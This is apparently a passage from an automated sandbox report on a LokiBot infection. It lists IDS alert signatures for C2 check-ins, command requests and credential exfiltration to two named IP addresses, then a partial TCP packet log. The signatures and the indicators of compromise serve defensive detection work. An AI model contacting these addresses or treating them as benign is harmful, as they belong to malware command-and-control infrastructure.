192.168.2.3172.67.154.7249757802024318 06/23/22-17:54:50.135454	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249770802024318 06/23/22-17:55:02.423254	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349745802024313 06/23/22-17:54:39.886492	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349774802021641 06/23/22-17:55:10.726793	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249769802021641 06/23/22-17:55:00.833023	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249772802025381 06/23/22-17:55:07.425069	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249852802021641 06/23/22-17:55:55.592533	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49852	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349780802024313 06/23/22-17:55:16.534873	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349872802025381 06/23/22-17:56:02.086134	TCP	2025381	ET TROJAN LokiBot Checkin	49872	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349745802024318 06/23/22-17:54:39.886492	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249757802024313 06/23/22-17:54:50.135454	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349792802021641 06/23/22-17:55:18.935502	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349881802021641 06/23/22-17:56:16.928509	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49881	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249882802024313 06/23/22-17:56:19.809048	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49882	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349776802024318 06/23/22-17:55:13.438859	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49776	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349813802024313 06/23/22-17:55:22.328153	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49813	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249770802025381 06/23/22-17:55:02.423254	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349776802024313 06/23/22-17:55:13.438859	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249877802025381 06/23/22-17:56:13.789082	TCP	2025381	ET TROJAN LokiBot Checkin	49877	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349883802021641 06/23/22-17:56:20.757705	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49883	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349813802024318 06/23/22-17:55:22.328153	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49813	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249741802024317 06/23/22-17:54:33.910153	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49741	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249747802021641 06/23/22-17:54:44.305987	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249845802024313 06/23/22-17:55:53.427872	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49845	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249744802021641 06/23/22-17:54:38.472164	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249741802024312 06/23/22-17:54:33.910153	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49741	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349865802024313 06/23/22-17:56:00.557524	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49865	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249762802024313 06/23/22-17:54:52.263394	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349865802024318 06/23/22-17:56:00.557524	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49865	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249767802025381 06/23/22-17:54:57.914899	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249773802025381 06/23/22-17:55:09.049678	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249845802024318 06/23/22-17:55:53.427872	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49845	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349766802021641 06/23/22-17:54:56.372364	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249831802021641 06/23/22-17:55:33.546351	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49831	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249762802024318 06/23/22-17:54:52.263394	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249771802024313 06/23/22-17:55:04.009923	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349803802021641 06/23/22-17:55:20.890777	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349778802024313 06/23/22-17:55:15.087771	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249769802025381 06/23/22-17:55:00.833023	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349778802024318 06/23/22-17:55:15.087771	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249742802021641 06/23/22-17:54:35.573404	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249773802024318 06/23/22-17:55:09.049678	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349837802024318 06/23/22-17:55:42.276335	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49837	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349792802025381 06/23/22-17:55:18.935502	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349765802024318 06/23/22-17:54:54.716737	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349843802024313 06/23/22-17:55:45.763232	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49843	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349872802021641 06/23/22-17:56:02.086134	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49872	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349837802024313 06/23/22-17:55:42.276335	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49837	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349881802025381 06/23/22-17:56:16.928509	TCP	2025381	ET TROJAN LokiBot Checkin	49881	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349765802024313 06/23/22-17:54:54.716737	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249743802024313 06/23/22-17:54:37.108830	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249772802021641 06/23/22-17:55:07.425069	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249873802024313 06/23/22-17:56:04.198158	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49873	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249875802025381 06/23/22-17:56:08.656582	TCP	2025381	ET TROJAN LokiBot Checkin	49875	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249743802024318 06/23/22-17:54:37.108830	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349843802024318 06/23/22-17:55:45.763232	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49843	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249873802024318 06/23/22-17:56:04.198158	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49873	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349837802025381 06/23/22-17:55:42.276335	TCP	2025381	ET TROJAN LokiBot Checkin	49837	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249859802024313 06/23/22-17:55:58.152468	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49859	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249743802021641 06/23/22-17:54:37.108830	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249746802024318 06/23/22-17:54:42.346945	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249844802024318 06/23/22-17:55:50.553165	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49844	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249859802024318 06/23/22-17:55:58.152468	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49859	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249746802024313 06/23/22-17:54:42.346945	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349883802025381 06/23/22-17:56:20.757705	TCP	2025381	ET TROJAN LokiBot Checkin	49883	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249844802024313 06/23/22-17:55:50.553165	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49844	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249749802021641 06/23/22-17:54:47.375834	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349836802024318 06/23/22-17:55:40.617404	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49836	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249747802025381 06/23/22-17:54:44.305987	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249845802025381 06/23/22-17:55:53.427872	TCP	2025381	ET TROJAN LokiBot Checkin	49845	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249770802021641 06/23/22-17:55:02.423254	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349836802024313 06/23/22-17:55:40.617404	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49836	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249882802025381 06/23/22-17:56:19.809048	TCP	2025381	ET TROJAN LokiBot Checkin	49882	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249816802024313 06/23/22-17:55:26.329557	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49816	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249877802024313 06/23/22-17:56:13.789082	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49877	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249773802024313 06/23/22-17:55:09.049678	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349766802025381 06/23/22-17:54:56.372364	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249816802024318 06/23/22-17:55:26.329557	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49816	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249767802021641 06/23/22-17:54:57.914899	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349778802021641 06/23/22-17:55:15.087771	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349876802021641 06/23/22-17:56:11.073086	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49876	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349775802025381 06/23/22-17:55:12.061012	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349803802025381 06/23/22-17:55:20.890777	TCP	2025381	ET TROJAN LokiBot Checkin	49803	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249877802024318 06/23/22-17:56:13.789082	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49877	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249741802025381 06/23/22-17:54:33.910153	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349835802024313 06/23/22-17:55:36.607918	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49835	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249762802021641 06/23/22-17:54:52.263394	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349792802024318 06/23/22-17:55:18.935502	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349881802024318 06/23/22-17:56:16.928509	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49881	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349775802024318 06/23/22-17:55:12.061012	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349835802024318 06/23/22-17:55:36.607918	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49835	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249875802021641 06/23/22-17:56:08.656582	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49875	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349775802024313 06/23/22-17:55:12.061012	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349865802025381 06/23/22-17:56:00.557524	TCP	2025381	ET TROJAN LokiBot Checkin	49865	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249768802021641 06/23/22-17:54:59.413778	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249852802024318 06/23/22-17:55:55.592533	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49852	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249873802025381 06/23/22-17:56:04.198158	TCP	2025381	ET TROJAN LokiBot Checkin	49873	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349745802021641 06/23/22-17:54:39.886492	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349774802024313 06/23/22-17:55:10.726793	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349776802025381 06/23/22-17:55:13.438859	TCP	2025381	ET TROJAN LokiBot Checkin	49776	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349774802024318 06/23/22-17:55:10.726793	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249831802025381 06/23/22-17:55:33.546351	TCP	2025381	ET TROJAN LokiBot Checkin	49831	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349836802025381 06/23/22-17:55:40.617404	TCP	2025381	ET TROJAN LokiBot Checkin	49836	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249742802025381 06/23/22-17:54:35.573404	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249769802024313 06/23/22-17:55:00.833023	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349780802021641 06/23/22-17:55:16.534873	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249852802024313 06/23/22-17:55:55.592533	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49852	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349881802024313 06/23/22-17:56:16.928509	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49881	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249769802024318 06/23/22-17:55:00.833023	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249757802021641 06/23/22-17:54:50.135454	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349792802024313 06/23/22-17:55:18.935502	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349765802025381 06/23/22-17:54:54.716737	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249882802024318 06/23/22-17:56:19.809048	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49882	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349813802025381 06/23/22-17:55:22.328153	TCP	2025381	ET TROJAN LokiBot Checkin	49813	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349813802021641 06/23/22-17:55:22.328153	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49813	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249772802024318 06/23/22-17:55:07.425069	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349774802025381 06/23/22-17:55:10.726793	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349776802021641 06/23/22-17:55:13.438859	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249873802021641 06/23/22-17:56:04.198158	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49873	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249816802025381 06/23/22-17:55:26.329557	TCP	2025381	ET TROJAN LokiBot Checkin	49816	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249882802021641 06/23/22-17:56:19.809048	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49882	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349865802021641 06/23/22-17:56:00.557524	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49865	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349883802024318 06/23/22-17:56:20.757705	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49883	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349883802024313 06/23/22-17:56:20.757705	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49883	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249844802025381 06/23/22-17:55:50.553165	TCP	2025381	ET TROJAN LokiBot Checkin	49844	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249747802024313 06/23/22-17:54:44.305987	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249749802025381 06/23/22-17:54:47.375834	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249845802021641 06/23/22-17:55:53.427872	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49845	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249746802025381 06/23/22-17:54:42.346945	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249741802021641 06/23/22-17:54:33.910153	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249744802024318 06/23/22-17:54:38.472164	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249859802025381 06/23/22-17:55:58.152468	TCP	2025381	ET TROJAN LokiBot Checkin	49859	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349835802025381 06/23/22-17:55:36.607918	TCP	2025381	ET TROJAN LokiBot Checkin	49835	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249744802024313 06/23/22-17:54:38.472164	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249747802024318 06/23/22-17:54:44.305987	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349803802024313 06/23/22-17:55:20.890777	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249852802025381 06/23/22-17:55:55.592533	TCP	2025381	ET TROJAN LokiBot Checkin	49852	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349766802024318 06/23/22-17:54:56.372364	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249831802024313 06/23/22-17:55:33.546351	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49831	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249771802021641 06/23/22-17:55:04.009923	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349803802024318 06/23/22-17:55:20.890777	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49803	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249831802024318 06/23/22-17:55:33.546351	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49831	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249757802025381 06/23/22-17:54:50.135454	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249742802024317 06/23/22-17:54:35.573404	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49742	80	192.168.2.3	172.67.154.72
192.168.2.3172.67.154.7249742802024312 06/23/22-17:54:35.573404	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49742	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349766802024313 06/23/22-17:54:56.372364	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249768802025381 06/23/22-17:54:59.413778	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349872802024313 06/23/22-17:56:02.086134	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49872	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349843802021641 06/23/22-17:55:45.763232	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49843	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349765802021641 06/23/22-17:54:54.716737	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349837802021641 06/23/22-17:55:42.276335	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49837	80	192.168.2.3	104.21.40.153
192.168.2.3104.21.40.15349872802024318 06/23/22-17:56:02.086134	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49872	80	192.168.2.3	104.21.40.153
192.168.2.3172.67.154.7249772802024313 06/23/22-17:55:07.425069	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.3	172.67.154.72
192.168.2.3104.21.40.15349780802025381 06/23/22-17:55:16.534873	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.3	104.21.40.153

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 23, 2022 17:54:33.873667955 CEST	49741	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:33.906069040 CEST	80	49741	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:33.907007933 CEST	49741	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:33.910152912 CEST	49741	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:33.942464113 CEST	80	49741	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:33.943350077 CEST	49741	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:33.975655079 CEST	80	49741	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:34.295411110 CEST	80	49741	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:34.295753002 CEST	80	49741	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:34.296437025 CEST	49741	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:34.296827078 CEST	49741	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:34.329353094 CEST	80	49741	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:35.537940025 CEST	49742	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:35.570380926 CEST	80	49742	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:35.570612907 CEST	49742	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:35.573404074 CEST	49742	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:35.605788946 CEST	80	49742	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:35.605947018 CEST	49742	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:35.638160944 CEST	80	49742	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:35.979684114 CEST	80	49742	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:35.979902029 CEST	49742	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:36.012144089 CEST	80	49742	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:36.218437910 CEST	80	49742	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:36.218904018 CEST	49742	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:37.072376966 CEST	49743	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:37.104892015 CEST	80	49743	172.67.154.72	192.168.2.3
Jun 23, 2022 17:54:37.105021000 CEST	49743	80	192.168.2.3	172.67.154.72
Jun 23, 2022 17:54:37.108829975 CEST	49743	80	192.168.2.3	172.67.154.72
